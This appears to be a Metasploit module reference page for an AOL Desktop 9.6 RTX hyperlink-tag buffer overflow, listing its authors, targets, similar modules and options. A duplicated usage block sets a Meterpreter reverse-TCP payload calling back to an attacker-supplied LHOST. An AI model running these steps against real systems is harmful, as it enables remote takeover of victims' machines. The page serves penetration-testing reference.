AOL Desktop 9.6 RTX Buffer Overflow
This module exploits a vulnerability found in AOL Desktop 9.6's Tool\rich.rct component. By supplying a long string of data in the hyperlink tag, rich.rct copies this data into a buffer using a strcpy function, which causes an overflow, and results arbitrary code execution.
Exploit Rank
- Normal
Exploit Authors
- sup3r < >
- sickn3ss < >
- sinn3r < sinn3r [at] metasploit.com >
- mr_me < steventhomasseeley [at] gmail.com >
- silent_dream < >
Vulnerability References
Exploit Targets
- 0 - AOL Desktop 9.6 on Windows XP SP3 (default)
- 1 - AOL Desktop 9.6 on Windows XP SP3 - NX bypass
- 2 - AOL Desktop 9.6 on Windows 7
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/aol_desktop_linktag
msf exploit(aol_desktop_linktag) > show payloads
msf exploit(aol_desktop_linktag) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(aol_desktop_linktag) > set LHOST [MY IP ADDRESS]
msf exploit(aol_desktop_linktag) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/aol_desktop_linktag
msf exploit(aol_desktop_linktag) > show payloads
msf exploit(aol_desktop_linktag) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(aol_desktop_linktag) > set LHOST [MY IP ADDRESS]
msf exploit(aol_desktop_linktag) > exploit
Exploit Module Options
| FILENAME | The filename (default: msf.rtx) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
